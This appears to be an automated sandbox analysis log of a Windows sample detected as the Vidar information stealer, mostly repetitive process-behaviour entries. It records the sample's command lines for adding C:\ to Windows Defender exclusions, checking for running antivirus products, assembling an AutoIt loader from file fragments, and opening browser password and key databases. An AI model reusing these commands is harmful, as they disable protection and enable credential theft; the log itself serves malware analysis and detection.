Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\din.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\din.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\din.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\din.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\din.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\din.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\din.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\din.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\din.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\din.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\din.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\din.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5103			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4711			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com

Dropped PE file which has not been started: C:\ProgramData\GDT0R9H4EU37\HLNYCB

Jump to dropped file

Source: C:\Users\user\Desktop\xoJxSAotVM.exe

API coverage: 3.8 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844	Thread sleep time: -6456360425798339s >= -30000s			Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7264	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19B0A00 GetFileInformationByHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,FindFirstFileW,FindClose,HeapFree,	0_2_00007FF6B19B0A00
Source: C:\ProgramData\din.exe	Code function: 6_2_00406301 FindFirstFileW,FindClose,	6_2_00406301
Source: C:\ProgramData\din.exe	Code function: 6_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	6_2_00406CC7

Source: C:\Users\user\Desktop\xoJxSAotVM.exe

Code function: 0_2_00007FF6B19DB220 GetSystemInfo,HeapFree,HeapReAlloc,HeapReAlloc,HeapReAlloc,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,

0_2_00007FF6B19DB220

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\112974	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\112974\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: svchost.exe, 00000016.00000002.2922640537.0000014B31A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2923779091.0000014B37054000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2923700607.0000014B37041000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: xoJxSAotVM.exe, 00000000.00000003.1739600600.0000028BCCC7D000.00000004.00000020.00020000.00000000.sdmp, xoJxSAotVM.exe, 00000000.00000002.1740195382.0000028BCCC82000.00000004.00000020.00020000.00000000.sdmp, xoJxSAotVM.exe, 00000000.00000003.1739882346.0000028BCCC7F000.00000004.00000020.00020000.00000000.sdmp, xoJxSAotVM.exe, 00000000.00000003.1739341601.0000028BCCC7C000.00000004.00000020.00020000.00000000.sdmp, xoJxSAotVM.exe, 00000000.00000003.1739304074.0000028BCCC78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\ProgramData\din.exe

Code function: 6_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

6_2_00406328

Source: C:\Users\user\Desktop\xoJxSAotVM.exe

Code function: 0_2_00007FF6B19BFA30 HeapAlloc,GetProcessHeap,HeapAlloc,

0_2_00007FF6B19BFA30

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\xoJxSAotVM.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds extensions / path to Windows Defender exclusion list

Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -C "Set-MpPreference -ExclusionPath C:\\"
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -C "Set-MpPreference -ExclusionPath C:\\"			Jump to behavior

Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -C "Set-MpPreference -ExclusionPath C:\\"	Jump to behavior
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C C:\ProgramData\din.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\din.exe C:\ProgramData\din.exe	Jump to behavior
Source: C:\ProgramData\din.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Gone Gone.cmd && Gone.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 112974	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "ApplianceFellowshipWhileRegistry" Beverly	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bulgarian + ..\Apply + ..\Legs + ..\Rules + ..\Vat + ..\July + ..\Gamma + ..\Geographic r	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\112974\Decade.com Decade.com r	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: Decade.com, 00000010.00000000.1770263369.0000000000DC6000.00000002.00000001.01000000.00000008.sdmp, Decade.com.7.dr, Beverly.6.dr

Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Queries volume information: C:\ProgramData VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\xoJxSAotVM.exe

Code function: 0_2_00007FF6B19F11BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF6B19F11BC

Source: C:\ProgramData\din.exe

Code function: 6_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

6_2_00406831

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db	Jump to behavior
